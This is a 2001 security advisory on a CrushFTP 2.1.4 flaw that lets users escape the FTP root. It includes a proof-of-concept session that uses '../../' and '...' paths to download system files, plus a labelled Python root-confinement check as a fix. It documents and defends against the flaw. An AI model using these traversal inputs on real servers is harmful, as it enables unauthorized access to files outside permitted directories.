Crush FTP Relative Path Vulnerability
A vulnerability exists that lets an attacker break out of an FTP root.
May 6, 2001
Reported May 3, 2001, by Joe Testa.
VERSIONS AFFECTED
· CrushFTP Server 2.1.4 for Windows 2000, Windows NT, Windows Me, and Windows 9x
DESCRIPTION
A vulnerability exists that lets an attacker break out of an FTP root. For example, by connecting to a vulnerable host and issuing the change directory (CD) command, an attacker can access the root directory where the FTP server is running. An attacker can also use relative paths to download files outside of an FTP root.
DEMONSTRATION
Joe Testa also provided the following proof-of-concept scenario:
The following is an illustration of the problem. An ftproot of
"c:\directory\directory" was used.
>ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220-Welcome to CrushFTP!
220 CrushFTP Server Ready.
User (xxxxxxxxxx.rh.rit.edu:(none)):jdog
331 Username OK. Need password.
Password:
230-Welcome!
230 Password OK. Connected.
ftp> get ../../autoexec.bat
200 PORT command successful.127.0.0.1:1868
150 Opening ASCII mode data connection for ../../autoexec.bat (419 bytes).
226-Download File Size:419bytes @ 0K/sec.
226 Transfer complete.
ftp: 419 bytes received in 0.00Seconds 419000.00Kbytes/sec.
ftp> cd ...
250 "/.../" CWD command successful.
ftp> get command.com
200 PORT command successful.127.0.0.1:1870
150 Opening ASCII mode data connection for command.com (93890 bytes).
226-Download File Size:93890bytes @ 92K/sec.
226 Transfer complete.
ftp: 94570 bytes received in 1.86Seconds 50.84Kbytes/sec.
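Added example, not part of the original advisory and not CrushFTP's code: a root-confinement check that rejects both requests shown in the session above (`get ../../autoexec.bat` and `cd ...`). The function name, the exception class and the extra rules for drive letters and trailing dots or spaces are assumptions for illustration and go beyond the two cases on the page; `ntpath` is used so Windows path rules apply on any OS.

```python
import ntpath  # Windows path semantics on any OS, so this runs offline


class PathEscape(Exception):
    """Raised when a client-supplied path would leave the FTP root."""


def resolve_in_root(ftp_root, virtual_cwd, requested):
    """Map an FTP path argument to a real path confined to ftp_root.

    virtual_cwd is the session directory as the client sees it ("/" is the
    FTP root). Returns the real Windows path or raises PathEscape.
    """
    requested = requested.replace("\\", "/")
    # Absolute FTP paths restart at the virtual root, never the drive root.
    if requested.startswith("/"):
        parts = []
    else:
        parts = [p for p in virtual_cwd.split("/") if p]
    for comp in requested.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                raise PathEscape(f"{requested!r} climbs above the FTP root")
            parts.pop()
            continue
        # The session above shows "cd ..." leaving the root, so dot-only
        # components are never handed to the filesystem.
        if set(comp) == {"."}:
            raise PathEscape(f"dot-only component {comp!r} rejected")
        # Assumed extra rules: no drive letters or stream names, and no
        # trailing dot or space, which Win32 strips when opening a file.
        if ":" in comp or comp[-1] in ". ":
            raise PathEscape(f"component {comp!r} rejected")
        parts.append(comp)
    root = ntpath.normpath(ftp_root)
    real = ntpath.normpath(ntpath.join(root, *parts))
    # Defence in depth: confirm containment on the final normalized path.
    if ntpath.commonpath([root, real]).lower() != root.lower():
        raise PathEscape(f"{real!r} is outside {root!r}")
    return real
```

The check works on the virtual path first and only then builds the real path, so a request is refused before any filesystem call sees it.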
VENDOR RESPONSE
The program author, Ben Spink, has released version 2.1.7, which is not subject to this vulnerability.
CREDIT
Discovered by Joe Testa.